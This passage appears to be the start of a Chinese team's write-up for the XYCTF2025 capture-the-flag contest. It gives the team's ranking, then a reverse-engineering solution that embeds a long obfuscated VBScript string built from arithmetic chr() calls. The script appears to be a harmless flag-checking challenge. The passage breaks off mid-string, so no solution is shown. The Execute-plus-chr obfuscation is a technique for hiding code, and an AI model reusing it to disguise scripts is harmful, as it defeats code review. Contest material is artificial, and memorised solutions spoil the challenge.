霍雅
追求源于热爱,极致源于梦想!
XYCTF2025 广职信安一队 wp
04/06
最终排名为33名共806队(只计算有分的队伍)
RE
WARMUP
用脚本ASCII计算并转换可得
import re
vbs_code = """
Execute(chr( 667205/8665 ) & chr( -7671+7786 ) & chr( 8541-8438 ) & chr( 422928/6408 ) & chr( -1948+2059 ) & chr( -3066+3186 ) & chr( 756-724 ) & chr( 4080/120 ) & chr( -3615+3683 ) & chr( -1619+1720 ) & chr( -2679+2776 ) & chr( 659718/5787 ) & chr( 302752/9461 ) & chr( -6627+6694 ) & chr( -4261+4345 ) & chr( 81690/1167 ) & chr( 636180/9220 ) & chr( 538658/6569 ) & chr( -1542+1588 ) & chr( -1644+1676 ) & chr( 122184/1697 ) & chr( 966411/9963 ) & chr( 2186-2068 ) & chr( -5283+5384 ) & chr( 305056/9533 ) & chr( 66402/651 ) & chr( 1141452/9756 ) & chr( 882090/8019 ) & chr( -4243+4275 ) & chr( 2669-2564 ) & chr( 83+27 ) & chr( 254880/7965 ) & chr( -1291+1379 ) & chr( -4699+4788 ) & chr( 4730-4663 ) & chr( -1179+1263 ) & chr( 5274-5204 ) & chr( 210144/6567 ) & chr( -6803+6853 ) & chr( 6655-6607 ) & chr( 4067-4017 ) & chr( 121900/2300 ) & chr( -6158+6191 ) & chr( 11934/351 ) & chr( 64883/4991 ) & chr( 65420/6542 ) & chr( 3781-3679 ) & chr( 1612-1504 ) & chr( 892788/9204 ) & chr( 927618/9006 ) & chr( -6692+6724 ) & chr( 410591/6731 ) & chr( 6675-6643 ) & chr( 697880/9560 ) & chr( 4250-4140 ) & chr( 5464-5352 ) & chr( -1082+1199 ) & chr( 3343-3227 ) & chr( 1211-1145 ) & chr( 482406/4346 ) & chr( -5549+5669 ) & chr( -5150+5190 ) & chr( 4400-4366 ) & chr( -3277+3346 ) & chr( -6649+6759 ) & chr( -5669+5785 ) & chr( -6734+6835 ) & chr( 9757-9643 ) & chr( 109-77 ) & chr( 5620-5504 ) & chr( -2887+2991 ) & chr( -3081+3182 ) & chr( -5109+5141 ) & chr( 699860/9998 ) & chr( -3603+3679 ) & chr( 1631-1566 ) & chr( 445-374 ) & chr( 294118/5071 ) & chr( -1115+1149 ) & chr( 222376/5054 ) & chr( 8137-8105 ) & chr( -1653+1687 ) & chr( 357104/4058 ) & chr( 1650-1561 ) & chr( -9501+9568 ) & chr( 1047-963 ) & chr( 2540-2470 ) & chr( 1692-1658 ) & chr( 9947-9906 ) & chr( 9186-9173 ) & chr( -2846+2856 ) & chr( 425187/3573 ) & chr( -3066+3167 ) & chr( 2850-2748 ) & chr( -2992+3090 ) & chr( 958230/8190 ) & chr( 869295/7305 ) & chr( 3380-3275 ) & chr( -7338+7455 ) & chr( 408848/4048 ) & chr( 9211-9179 ) & chr( -2437+2498 ) & chr( 1672-1640 ) & chr( 2378-2344 ) & chr( 544749/9557 ) & chr( 351120/7315 ) & chr( 773800/7738 ) & chr( 2033-1931 ) & chr( -8059+8111 ) & chr( -4731+4783 ) & chr( -9204+9252 ) & chr( -4261+4316 ) & chr( 850521/8421 ) & chr( -7011+7112 ) & chr( 292272/6089 ) & chr( -8609+8666 ) & chr( -2921+2972 ) & chr( 6772-6672 ) & chr( 487611/9561 ) & chr( -6754+6802 ) & chr( 464835/8155 ) & chr( -939+987 ) & chr( 421173/7389 ) & chr( -8145+8201 ) & chr( 9368-9268 ) & chr( -7682+7738 ) & chr( -8646+8699 ) & chr( 484612/4996 ) & chr( 286832/5516 ) & chr( -9710+9760 ) & chr( 884156/9022 ) & chr( 7080-6979 ) & chr( 265477/5009 ) & chr( 6+49 ) & chr( 5395-5298 ) & chr( 6645-6595 ) & chr( -9706+9763 ) & chr( -6697+6752 ) & chr( 927-870 ) & chr( 4048-3946 ) & chr( 34398/702 ) & chr( 825675/8175 ) & chr( -438+491 ) & chr( 87808/1792 ) & chr( -2601+2653 ) & chr( 420228/7782 ) & chr( -5266+5317 ) & chr( 53059/547 ) & chr( 477054/9354 ) & chr( 9238-9189 ) & chr( 799112/7912 ) & chr( 3340-3284 ) & chr( 8544-8444 ) & chr( 1220-1171 ) & chr( -7192+7245 ) & chr( 73629/729 ) & chr( 6523-6473 ) & chr( 2761-2659 ) & chr( 358124/3692 ) & chr( -6167+6266 ) & chr( -3842+3894 ) & chr( 7840-7739 ) & chr( -3980+4036 ) & chr( 987-935 ) & chr( 6868/68 ) & chr( -559+656 ) & chr( 6513-6465 ) & chr( 843300/8433 ) & chr( -8159+8261 ) & chr( -753+807 ) & chr( 278700/5574 ) & chr( 5600/112 ) & chr( -549+646 ) & chr( -7697+7750 ) & chr( 390292/7364 ) & chr( 988020/9980 ) & chr( -3250+3302 ) & chr( 6295-6195 ) & chr( 4342-4242 ) & chr( -9602+9704 ) & chr( 1312-1214 ) & chr( 1065-1012 ) & chr( 1122/22 ) & chr( 191012/3604 ) & chr( 330775/3275 ) & chr( 226848/2224 ) & chr( 4973-4922 ) & chr( 369357/3657 ) & chr( -7229+7282 ) & chr( 588/12 ) & chr( 57570/570 ) & chr( 4554-4498 ) & chr( 483924/4938 ) & chr( 485600/9712 ) & chr( 5051-4998 ) & chr( 8467-8417 ) & chr( -6799+6855 ) & chr( 668360/6820 ) & chr( 428008/7643 ) & chr( -309+359 ) & chr( -7495+7549 ) & chr( 198200/1982 ) & chr( -4298+4351 ) & chr( 2979-2928 ) & chr( -391+443 ) & chr( -5951+6006 ) & chr( -2271+2372 ) & chr( 1431-1382 ) & chr( -2812+2866 ) & chr( 4906-4853 ) & chr( -5308+5365 ) & chr( -8587+8636 ) & chr( -1003+1053 ) & chr( 468741/4641 ) & chr( 8449-8392 ) & chr( 14877/261 ) & chr( -5097+5146 ) & chr( 6695-6646 ) & chr( -2866+2922 ) & chr( 483786/9486 ) & chr( -4142+4193 ) & chr( 2347-2296 ) & chr( -1784+1833 ) & chr( 116229/2193 ) & chr( -1099+1148 ) & chr( 8230-8180 ) & chr( -4351+4406 ) & chr( 1975-1924 ) & chr( 779229/7871 ) & chr( 102960/1040 ) & chr( 67830/1330 ) & chr( -4771+4873 ) & chr( -32+129 ) & chr( 155456/2776 ) & chr( 9798-9700 ) & chr( 4944-4894 ) & chr( -2496+2594 ) & chr( 5495-5444 ) & chr( 8113-8015 ) & chr( -8444+8496 ) & chr( 3896-3847 ) & chr( 6306-6255 ) & chr( 1284-1185 ) & chr( 1003986/9843 ) & chr( -1321+1371 ) & chr( 2676-2578 ) & chr( -5421+5521 ) & chr( 564186/5757 ) & chr( 6608-6559 ) & chr( 7038-6937 ) & chr( 209720/3745 ) & chr( -616+715 ) & chr( 9766-9709 ) & chr( 2111-2012 ) & chr( 528993/9981 ) & chr( 1901-1851 ) & chr( 281344/5024 ) & chr( 5695-5641 ) & chr( 4815-4762 ) & chr( 399556/3956 ) & chr( 572730/5615 ) & chr( -5718+5817 ) & chr( 21+27 ) & chr( 4532-4475 ) & chr( -8446+8499 ) & chr( 5786-5689 ) & chr( 4177-4121 ) & chr( -8411+8511 ) & chr( -9499+9599 ) & chr( 479528/8563 ) & chr( 6850-6793 ) & chr( -3725+3823 ) & chr( -8692+8743 ) & chr( 284298/2901 ) & chr( 214302/4202 ) & chr( 576675/5825 ) & chr( -4565+4667 ) & chr( -7223+7321 ) & chr( 383278/3911 ) & chr( -2540+2590 ) & chr( 35+13 ) & chr( -5549+5597 ) & chr( 969122/9889 ) & chr( 964712/9844 ) & chr( -6231+6328 ) & chr( -1560+1660 ) & chr( -7416+7514 ) & chr( 609144/5972 ) & chr( 471432/9066 ) & chr( -4500+4597 ) & chr( 8620-8566 ) & chr( 7113-7014 ) & chr( -2488+2588 ) & chr( -3599+3651 ) & chr( 211956/6234 ) & chr( 1697-1665 ) & chr( -5122+5161 ) & chr( -3189+3221 ) & chr( -5840+114 ) & chr( -37790+6278 ) & chr( -8.231351E+07/3957 ) & chr( -14110+7864 ) & chr( -30457-1205 ) & chr( 9930-9863 ) & chr( 107-55 ) & chr( 517-7291 ) & chr( -31263+6916 ) & chr( -29685+9083 ) & chr( -2.138515E+07/3442 ) & chr( -26304-1370 ) & chr( -1.510879E+08/6060 ) & chr( -903-3261 ) & chr( -22484-8007 ) & chr( -34437+5126 ) & chr( -10635+3856 ) & chr( -1.97004E+08/9374 ) & chr( -1.079768E+08/6550 ) & chr( -2.533546E+07/3739 ) & chr( -25645+6931 ) & chr( -1.720817E+08/7056 ) & chr( -12498+5774 ) & chr( -2.164872E+08/7546 ) & chr( -8955-8316 ) & chr( -3584+3597 ) & chr( -1280+1290 ) & chr( 795633/7041 ) & chr( 291669/2451 ) & chr( 9044-8942 ) & chr( 264014/2614 ) & chr( -7841+7873 ) & chr( 10919/179 ) & chr( 22272/696 ) & chr( -8135+8169 ) & chr( -5733+5847 ) & chr( 371547/3753 ) & chr( 473980/9115 ) & chr( 391-284 ) & chr( -1824+1925 ) & chr( -1707+1828 ) & chr( 2151-2117 ) & chr( 2535/195 ) & chr( 7236-7226 ) & chr( 58097/4469 ) & chr( 2710/271 ) & chr( 118677/3043 ) & chr( -7992+8024 ) & chr( -5.682766E+07/8145 ) & chr( -3.747722E+07/1805 ) & chr( -20535-2876 ) & chr( -5076000/750 ) & chr( -28220-733 ) & chr( -33583+7603 ) & chr( 7730-7648 ) & chr( 7057-6990 ) & chr( 338728/6514 ) & chr( -4.203267E+07/6205 ) & chr( -20128-4219 ) & chr( -29090+8488 ) & chr( -7954+1177 ) & chr( -25730+8808 ) & chr( -23859-3357 ) & chr( -2130+2143 ) & chr( 6827-6817 ) & chr( 4334-4264 ) & chr( 4851-4734 ) & chr( 5121-5011 ) & chr( 7034-6935 ) & chr( 4197-4081 ) & chr( -1823+1928 ) & chr( 1032744/9304 ) & chr( 1547-1437 ) & chr( -7393+7425 ) & chr( 608932/7426 ) & chr( 864513/7389 ) & chr( 1748-1638 ) & chr( 501676/6118 ) & chr( 510473/7619 ) & chr( -6752+6792 ) & chr( -5142+5257 ) & chr( -9558+9635 ) & chr( 7906-7805 ) & chr( 5308-5193 ) & chr( 163300/1420 ) & chr( 10961/113 ) & chr( 740364/7188 ) & chr( -5327+5428 ) & chr( 5703-5659 ) & chr( -7307+7339 ) & chr( 445970/3878 ) & chr( 608-492 ) & chr( -4799+4913 ) & chr( -3687+3762 ) & chr( 9993-9892 ) & chr( 1032493/8533 ) & chr( 103607/2527 ) & chr( 123266/9482 ) & chr( 61520/6152 ) & chr( 251424/7857 ) & chr( 104032/3251 ) & chr( -7228+7260 ) & chr( 239648/7489 ) & chr( -1858+1926 ) & chr( 865515/8243 ) & chr( 818481/7509 ) & chr( 244384/7637 ) & chr( -4252+4359 ) & chr( 10+66 ) & chr( -3202+3303 ) & chr( 466070/4237 ) & chr( 3973-3929 ) & chr( -7658+7690 ) & chr( 563430/5366 ) & chr( 168872/3838 ) & chr( 306144/9567 ) & chr( 158046/1491 ) & chr( 311740/7085 ) & chr( -6862+6894 ) & chr( 621760/5360 ) & chr( -8151+8252 ) & chr( 9608-9499 ) & chr( 309680/2765 ) & chr( 244288/5552 ) & chr( 6191-6159 ) & chr( 705936/6303 ) & chr( 4828-4717 ) & chr( 1097330/9542 ) & chr( 431596/9809 ) & chr( -8819+8851 ) & chr( 546675/4925 ) & chr( 805545/6885 ) & chr( -5087+5203 ) & chr( 1223-1151 ) & chr( 9566-9465 ) & chr( 2413-2293 ) & chr( 4760-4747 ) & chr( -4859+4869 ) & chr( 3357-3325 ) & chr( 667-635 ) & chr( -2223+2255 ) & chr( 4357-4325 ) & chr( 366928/5396 ) & chr( 203175/1935 ) & chr( -7837+7946 ) & chr( 47936/1498 ) & chr( 3589-3474 ) & chr( 254920/6373 ) & chr( 3498-3448 ) & chr( 54113/1021 ) & chr( 9319-9266 ) & chr( 380767/9287 ) & chr( 298804/6791 ) & chr( -5151+5183 ) & chr( 3487-3380 ) & chr( 246760/6169 ) & chr( 7465-7415 ) & chr( -8879+8932 ) & chr( -281+334 ) & chr( 314470/7670 ) & chr( -1151+1164 ) & chr( 4880-4870 ) & chr( 3582-3550 ) & chr( 147008/4594 ) & chr( 169248/5289 ) & chr( -8224+8256 ) & chr( 4654/358 ) & chr( -2894+2904 ) & chr( 3479-3447 ) & chr( 2036-2004 ) & chr( 7024-6992 ) & chr( -8686+8718 ) & chr( -664+703 ) & chr( 53952/1686 ) & chr( -10371+3595 ) & chr( -21805-3310 ) & chr( -1.930486E+08/8525 ) & chr( -6242-530 ) & chr( -2.479211E+08/9214 ) & chr( -28712+8110 ) & chr( 4047-9789 ) & chr( 278397/4419 ) & chr( -6794+6804 ) & chr( 310624/9707 ) & chr( 120896/3778 ) & chr( 6925-6893 ) & chr( 8256-8224 ) & chr( -4736+4843 ) & chr( 1256-1180 ) & chr( 4250-4149 ) & chr( -9132+9242 ) & chr( 173344/5417 ) & chr( -9030+9091 ) & chr( 72-40 ) & chr( 344204/4529 ) & chr( 351985/3485 ) & chr( 6120-6010 ) & chr( 1113-1073 ) & chr( 2781-2666 ) & chr( 6375-6259 ) & chr( 780330/6845 ) & chr( 106050/1414 ) & chr( 1239-1138 ) & chr( -986+1107 ) & chr( 324351/7911 ) & chr( -7872+7885 ) & chr( -1326+1336 ) & chr( 17728/554 ) & chr( 61600/1925 ) & chr( -4930+4962 ) & chr( 113856/3558 ) & chr( -7210+7280 ) & chr( 3126-3015 ) & chr( 9894-9780 ) & chr( 2040-2008 ) & chr( 957810/9122 ) & chr( -1680+1712 ) & chr( -7068+7129 ) & chr( -9765+9797 ) & chr( 4121-4073 ) & chr( -9924+9956 ) & chr( -4370+4454 ) & chr( 437340/3940 ) & chr( 5315-5283 ) & chr( 304500/6090 ) & chr( -6807+6860 ) & chr( 19186/362 ) & chr( -6044+6057 ) & chr( 9876-9866 ) & chr( -2071+2103 ) & chr( 8923-8891 ) & chr( 4890-4858 ) & chr( 7473-7441 ) & chr( 5632-5600 ) & chr( 8294-8262 ) & chr( -271+303 ) & chr( 6410-6378 ) & chr( 5536-5421 ) & chr( 44720/1118 ) & chr( 6272-6167 ) & chr( 26568/648 ) & chr( 233440/7295 ) & chr( -8944+9005 ) & chr( 204192/6381 ) & chr( 5731-5626 ) & chr( 9617-9604 ) & chr( 7388-7378 ) & chr( 960/30 ) & chr( 99008/3094 ) & chr( 8422-8390 ) & chr( 19136/598 ) & chr( -6328+6360 ) & chr( 199712/6241 ) & chr( -2315+2347 ) & chr( -6898+6930 ) & chr( 9875-9768 ) & chr( -4621+4661 ) & chr( -7725+7830 ) & chr( -3507+3548 ) & chr( 4844-4812 ) & chr( 570716/9356 ) & chr( -3814+3846 ) & chr( -1467+1532 ) & chr( 138115/1201 ) & chr( -7634+7733 ) & chr( -7021+7061 ) & chr( 942-865 ) & chr( 924630/8806 ) & chr( 8706-8606 ) & chr( -6756+6796 ) & chr( -5325+5440 ) & chr( 2765-2649 ) & chr( -7079+7193 ) & chr( 2100/28 ) & chr( 8156-8055 ) & chr( -7792+7913 ) & chr( 5324/121 ) & chr( 6423-6391 ) & chr( 5454-5414 ) & chr( -4828+4933 ) & chr( 13504/422 ) & chr( 244552/3176 ) & chr( -3016+3127 ) & chr( -4103+4203 ) & chr( 2567-2535 ) & chr( 435-328 ) & chr( 787-711 ) & chr( 1474-1373 ) & chr( 803550/7305 ) & chr( -5410+5451 ) & chr( -6556+6588 ) & chr( -2204+2247 ) & chr( 223424/6982 ) & chr( -8753+8802 ) & chr( 135872/3088 ) & chr( -7757+7789 ) & chr( 272-223 ) & chr( 340177/8297 ) & chr( 1487-1446 ) & chr( -9083+9115 ) & chr( 7132-7093 ) & chr( 4540-4508 ) & chr( -13541+6804 ) & chr( -7.75285E+07/2501 ) & chr( -32055+4060 ) & chr( -1318-5661 ) & chr( -5.265648E+07/3209 ) & chr( -31857+4377 ) & chr( 585065/9001 ) & chr( -2558+2641 ) & chr( -8549+8616 ) & chr( 6403-6330 ) & chr( 6271-6198 ) & chr( -2.477346E+07/3988 ) & chr( -17020-9885 ) & chr( -2542488/104 ) & chr( -1327+1340 ) & chr( -887+897 ) & chr( -7751+7783 ) & chr( 2629-2597 ) & chr( -6489+6521 ) & chr( 2254-2222 ) & chr( 154518/1981 ) & chr( -764+865 ) & chr( 629040/5242 ) & chr( 1098636/9471 ) & chr( 78793/6061 ) & chr( -7110+7120 ) & chr( -7378+7410 ) & chr( -1777+1809 ) & chr( 2538-2506 ) & chr( 119392/3731 ) & chr( -4327+4340 ) & chr( 10580/1058 ) & chr( -7677+7709 ) & chr( 8254-8222 ) & chr( 3782-3750 ) & chr( 214240/6695 ) & chr( 7006-6967 ) & chr( 8305-8273 ) & chr( 4841-4766 ) & chr( 937-854 ) & chr( 616460/9484 ) & chr( -16-6721 ) & chr( -28078-2921 ) & chr( -24670-3325 ) & chr( -9340+3372 ) & chr( -25211-6560 ) & chr( -22908+5154 ) & chr( 6567-6554 ) & chr( -635+645 ) & chr( -5907+5939 ) & chr( 4841-4809 ) & chr( 20576/643 ) & chr( -2196+2228 ) & chr( 3270-3164 ) & chr( 212384/6637 ) & chr( 509533/8353 ) & chr( 94368/2949 ) & chr( -1648+1696 ) & chr( 23335/1795 ) & chr( -86+96 ) & chr( 209408/6544 ) & chr( 5186-5154 ) & chr( 91072/2846 ) & chr( 8978-8946 ) & chr( 45850/655 ) & chr( 256632/2312 ) & chr( -8647+8761 ) & chr( 5661-5629 ) & chr( 191940/1828 ) & chr( 2132-2100 ) & chr( -9855+9916 ) & chr( 3562-3530 ) & chr( 24864/518 ) & chr( 275424/8607 ) & chr( 3176-3092 ) & chr( 3798-3687 ) & chr( -6055+6087 ) & chr( -6024+6074 ) & chr( -6425+6478 ) & chr( -9745+9798 ) & chr( 23387/1799 ) & chr( -3891+3901 ) & chr( -4637+4669 ) & chr( -3183+3215 ) & chr( 9860-9828 ) & chr( 1677-1645 ) & chr( 3698-3666 ) & chr( -7915+7947 ) & chr( 200128/6254 ) & chr( -3984+4016 ) & chr( 5982-5876 ) & chr( -5627+5659 ) & chr( 6122-6061 ) & chr( -5851+5883 ) & chr( 204520/5113 ) & chr( -566+672 ) & chr( 260512/8141 ) & chr( 7314-7271 ) & chr( -1563+1595 ) & chr( 5079-4964 ) & chr( 11680/292 ) & chr( 8464-8359 ) & chr( 6991-6950 ) & chr( -3136+3168 ) & chr( 4262-4219 ) & chr( 4518-4486 ) & chr( 9317-9210 ) & chr( 7615-7575 ) & chr( 55650/530 ) & chr( 1185-1144 ) & chr( 7853-7812 ) & chr( -3099+3131 ) & chr( 288288/3744 ) & chr( -8871+8982 ) & chr( -8502+8602 ) & chr( 2470-2438 ) & chr( 364100/7282 ) & chr( -8754+8807 ) & chr( 476874/8831 ) & chr( 768-755 ) & chr( 8485-8475 ) & chr( -6548+6580 ) & chr( 68960/2155 ) & chr( 31904/997 ) & chr( 113792/3556 ) & chr( -8387+8419 ) & chr( 116448/3639 ) & chr( 279552/8736 ) & chr( -2637+2669 ) & chr( -5483+5599 ) & chr( 4853-4752 ) & chr( -7090+7199 ) & chr( 544320/4860 ) & chr( 305600/9550 ) & chr( 510570/8370 ) & chr( 72640/2270 ) & chr( 3200-3085 ) & chr( -6820+6860 ) & chr( 396375/3775 ) & chr( -7447+7488 ) & chr( -9189+9202 ) & chr( -4261+4271 ) & chr( 1688-1656 ) & chr( 9083-9051 ) & chr( 9012-8980 ) & chr( -3650+3682 ) & chr( 291424/9107 ) & chr( 842-810 ) & chr( -7058+7090 ) & chr( -7119+7151 ) & chr( -4515+4630 ) & chr( 9315-9275 ) & chr( 2216-2111 ) & chr( -1847+1888 ) & chr( 100192/3131 ) & chr( 8671-8610 ) & chr( -1498+1530 ) & chr( 5376-5261 ) & chr( 965-925 ) & chr( 597628/5638 ) & chr( -6697+6738 ) & chr( 9809-9796 ) & chr( 740-730 ) & chr( 4866-4834 ) & chr( 8064-8032 ) & chr( 8204-8172 ) & chr( 6706-6674 ) & chr( -3302+3334 ) & chr( -9585+9617 ) & chr( 8259-8227 ) & chr( 9319-9287 ) & chr( 6042-5927 ) & chr( -4563+4603 ) & chr( 843124/7954 ) & chr( -468+509 ) & chr( 91-59 ) & chr( 55+6 ) & chr( -470+502 ) & chr( 8800-8684 ) & chr( -732+833 ) & chr( 1859-1750 ) & chr( -9065+9177 ) & chr( -3551+3564 ) & chr( -5998+6008 ) & chr( 309248/9664 ) & chr( 78080/2440 ) & chr( 1337-1305 ) & chr( 1031-999 ) & chr( -2405+2483 ) & chr( 900011/8911 ) & chr( 9591-9471 ) & chr( 3993-3877 ) & chr( 37024/2848 ) & chr( 2372-2362 ) & chr( -1999+2031 ) & chr( 402-370 ) & chr( 2339-2307 ) & chr( 215232/6726 ) & chr( 56706/4362 ) & chr( 88610/8861 ) & chr( 6347-6315 ) & chr( -1057+1089 ) & chr( -8215+8247 ) & chr( -5359+5391 ) & chr( 360048/9232 ) & chr( 150208/4694 ) & chr( 549760/6872 ) & chr( 709710/8655 ) & chr( -9253+9324 ) & chr( -1875+1940 ) & chr( 3060-9834 ) & chr( -1.219054E+08/5007 ) & chr( -16837-3765 ) & chr( -13859+7384 ) & chr( -40413+8132 ) & chr( -7.735399E+07/3455 ) & chr( -3620+3633 ) & chr( 7370/737 ) & chr( 9207-9175 ) & chr( 21216/663 ) & chr( -8881+8913 ) & chr( 59712/1866 ) & chr( 1881-1776 ) & chr( 5987-5955 ) & chr( 213378/3498 ) & chr( 185536/5798 ) & chr( -1106+1154 ) & chr( -6274+6306 ) & chr( 244-186 ) & chr( -7680+7712 ) & chr( 417216/3936 ) & chr( 1383-1351 ) & chr( 346419/5679 ) & chr( -7913+7945 ) & chr( 3201-3153 ) & chr( 268160/8380 ) & chr( -5532+5590 ) & chr( -6959+6991 ) & chr( 3356-3245 ) & chr( -7222+7339 ) & chr( 9549-9433 ) & chr( -426+498 ) & chr( 510555/5055 ) & chr( 699720/5831 ) & chr( -5601+5633 ) & chr( 260653/4273 ) & chr( 26752/836 ) & chr( 4148-4114 ) & chr( -6483+6517 ) & chr( 120601/9277 ) & chr( 92430/9243 ) & chr( 3296/103 ) & chr( 3355-3323 ) & chr( 6661-6629 ) & chr( -309+341 ) & chr( -4300+4370 ) & chr( 132090/1190 ) & chr( 296742/2603 ) & chr( -568+600 ) & chr( 576016/5143 ) & chr( 4279-4168 ) & chr( -3514+3629 ) & chr( -7862+7894 ) & chr( 201544/3304 ) & chr( 6720/210 ) & chr( -1246+1295 ) & chr( 6539-6507 ) & chr( 7479-7395 ) & chr( 685536/6176 ) & chr( -7312+7344 ) & chr( -2052+2128 ) & chr( -8510+8611 ) & chr( 311630/2833 ) & chr( 8715-8675 ) & chr( -6734+6849 ) & chr( -5728+5805 ) & chr( 9955-9854 ) & chr( 269445/2343 ) & chr( -4059+4174 ) & chr( 47142/486 ) & chr( 921-818 ) & chr( 663-562 ) & chr( 164328/4008 ) & chr( 23634/1818 ) & chr( 82110/8211 ) & chr( 5730-5698 ) & chr( 245312/7666 ) & chr( 1656-1624 ) & chr( 269536/8423 ) & chr( 168864/5277 ) & chr( -2835+2867 ) & chr( -9348+9380 ) & chr( 216128/6754 ) & chr( -6873+6978 ) & chr( 8769-8737 ) & chr( -7159+7220 ) & chr( -2374+2406 ) & chr( 145560/3639 ) & chr( 84945/809 ) & chr( 4967-4935 ) & chr( 3533-3490 ) & chr( -8222+8254 ) & chr( -5971+6020 ) & chr( 203811/4971 ) & chr( 64768/2024 ) & chr( -8894+8971 ) & chr( -7605+7716 ) & chr( 7530-7430 ) & chr( 8961-8929 ) & chr( 204800/4096 ) & chr( 34291/647 ) & chr( 5124-5070 ) & chr( 117455/9035 ) & chr( 70910/7091 ) & chr( 191072/5971 ) & chr( -8276+8308 ) & chr( 194464/6077 ) & chr( 1606-1574 ) & chr( 200032/6251 ) & chr( -183+215 ) & chr( 7729-7697 ) & chr( -6288+6320 ) & chr( 563-457 ) & chr( 48544/1517 ) & chr( 504-443 ) & chr( -227+259 ) & chr( 358600/8965 ) & chr( 5705-5599 ) & chr( -4736+4768 ) & chr( 321554/7478 ) & chr( -8525+8557 ) & chr( 402615/3501 ) & chr( 1320/33 ) & chr( 233100/2220 ) & chr( 7463-7422 ) & chr( 8959-8918 ) & chr( 9538-9506 ) & chr( -3809+3886 ) & chr( 17094/154 ) & chr( 3305-3205 ) & chr( 5389-5357 ) & chr( 101450/2029 ) & chr( -2702+2755 ) & chr( 422-368 ) & chr( 3681-3668 ) & chr( 1374-1364 ) & chr( 244192/7631 ) & chr( 2106-2074 ) & chr( 301504/9422 ) & chr( 6788-6756 ) & chr( 275072/8596 ) & chr( -2612+2644 ) & chr( 1544-1512 ) & chr( 263424/8232 ) & chr( 5985-5869 ) & chr( 409555/4055 ) & chr( 7844-7735 ) & chr( 668752/5971 ) & chr( 1110-1078 ) & chr( -880+941 ) & chr( 9828-9796 ) & chr( 610650/5310 ) & chr( -2213+2253 ) & chr( 5697-5592 ) & chr( 340505/8305 ) & chr( 1757-1744 ) & chr( 88340/8834 ) & chr( 2986-2954 ) & chr( -7747+7779 ) & chr( 5952-5920 ) & chr( 6697-6665 ) & chr( 180160/5630 ) & chr( 1671-1639 ) & chr( -8613+8645 ) & chr( 95904/2997 ) & chr( 8994-8879 ) & chr( 7256-7216 ) & chr( -5776+5881 ) & chr( 1529-1488 ) & chr( 179680/5615 ) & chr( -684+745 ) & chr( 119840/3745 ) & chr( 828000/7200 ) & chr( -1371+1411 ) & chr( 2474-2368 ) & chr( 144033/3513 ) & chr( 1617-1604 ) & chr( 9503-9493 ) & chr( -1100+1132 ) & chr( 211680/6615 ) & chr( 7607-7575 ) & chr( 5777-5745 ) & chr( 319712/9991 ) & chr( -9605+9637 ) & chr( 140672/4396 ) & chr( 3740-3708 ) & chr( 92575/805 ) & chr( 9363-9323 ) & chr( 292136/2756 ) & chr( -9536+9577 ) & chr( -9310+9342 ) & chr( 7634-7573 ) & chr( -9716+9748 ) & chr( -7090+7206 ) & chr( 376-275 ) & chr( -6333+6442 ) & chr( 3986-3874 ) & chr( 3115-3102 ) & chr( -2171+2181 ) & chr( 100544/3142 ) & chr( 74-42 ) & chr( -1400+1432 ) & chr( 81504/2547 ) & chr( 5073-5041 ) & chr( 4596-4564 ) & chr( 9048-9016 ) & chr( -2733+2765 ) & chr( -4650+4663 ) & chr( -151+161 ) & chr( 10592/331 ) & chr( 3163-3131 ) & chr( 4722-4690 ) & chr( 30624/957 ) & chr( 2545-2513 ) & chr( 251232/7851 ) & chr( -2926+2958 ) & chr( 239584/7487 ) & chr( 389-350 ) & chr( -2+34 ) & chr( -5.053404E+07/7460 ) & chr( -26034+1687 ) & chr( -19313-1289 ) & chr( -30-6697 ) & chr( -17366-1346 ) & chr( -15077-1903 ) & chr( -6552-432 ) & chr( -13927-3764 ) & chr( -37232+7921 ) & chr( 1107-7886 ) & chr( -15477-5539 ) & chr( -1.750707E+07/1062 ) & chr( -3.826407E+07/5647 ) & chr( 364959/5793 ) & chr( 2034-2024 ) & chr( -7296+7328 ) & chr( -3111+3143 ) & chr( -3156+3188 ) & chr( 7990-7958 ) & chr( 166496/5203 ) & chr( -4151+4183 ) & chr( 4071-4039 ) & chr( 9102-9070 ) & chr( -6166+6234 ) & chr( 283185/2697 ) & chr( 3833-3724 ) & chr( 119776/3743 ) & chr( 658224/5877 ) & chr( 7881-7773 ) & chr( 390328/4024 ) & chr( 8122-8017 ) & chr( 934010/8491 ) & chr( 579751/8653 ) & chr( -8024+8128 ) & chr( 57036/588 ) & chr( 2457-2343 ) & chr( 9781-9737 ) & chr( -5599+5631 ) & chr( -7710+7809 ) & chr( -4501+4606 ) & chr( 625072/5581 ) & chr( 783432/7533 ) & chr( 877488/8688 ) & chr( 6473-6359 ) & chr( 5963-5897 ) & chr( 150282/1242 ) & chr( -9775+9891 ) & chr( -7486+7587 ) & chr( 565-552 ) & chr( 5581-5571 ) & chr( 771-739 ) & chr( 69824/2182 ) & chr( 4603-4571 ) & chr( -5709+5741 ) & chr( 8242-8210 ) & chr( 94112/2941 ) & chr( 100352/3136 ) & chr( -8344+8376 ) & chr( -1824+1936 ) & chr( 6678-6570 ) & chr( 638454/6582 ) & chr( 6614-6509 ) & chr( 1012990/9209 ) & chr( 8744-8677 ) & chr( 561912/5403 ) & chr( 444163/4579 ) & chr( 10089-9975 ) & chr( 280960/8780 ) & chr( 320128/5248 ) & chr( -3399+3431 ) & chr( -1771+1836 ) & chr( 5417-5302 ) & chr( -1824+1923 ) & chr( 212600/5315 ) & chr( -4973+5050 ) & chr( 60060/572 ) & chr( 639000/6390 ) & chr( 355520/8888 ) & chr( 866410/7534 ) & chr( 5901-5824 ) & chr( 9869-9768 ) & chr( -4100+4215 ) & chr( 9973-9858 ) & chr( 601594/6202 ) & chr( 857887/8329 ) & chr( -7663+7764 ) & chr( -205+249 ) & chr( -5719+5751 ) & chr( 8618-8506 ) & chr( 822732/7412 ) & chr( 9707-9592 ) & chr( 106832/2428 ) & chr( 1917-1885 ) & chr( 7491-7442 ) & chr( 263507/6427 ) & chr( -3050+3091 ) & chr( 6688/209 ) & chr( 3579-3540 ) & chr( 62400/1950 ) & chr( -5.533603E+07/8508 ) & chr( -1.094461E+07/378 ) & chr( -19198-7803 ) & chr( -1503-5013 ) & chr( -22047-8352 ) & chr( -9364+9447 ) & chr( -3664+3731 ) & chr( 7198-7125 ) & chr( 6274-6201 ) & chr( -16376+9628 ) & chr( -3.882402E+07/1232 ) & chr( -35990+7452 ) & chr( 59020/4540 ) & chr( 32900/3290 ) & chr( 51776/1618 ) & chr( -7782+7814 ) & chr( 9795-9763 ) & chr( 254592/7956 ) & chr( 83520/2610 ) & chr( 7721-7689 ) & chr( -7133+7165 ) & chr( 1340-1308 ) & chr( 330066/3334 ) & 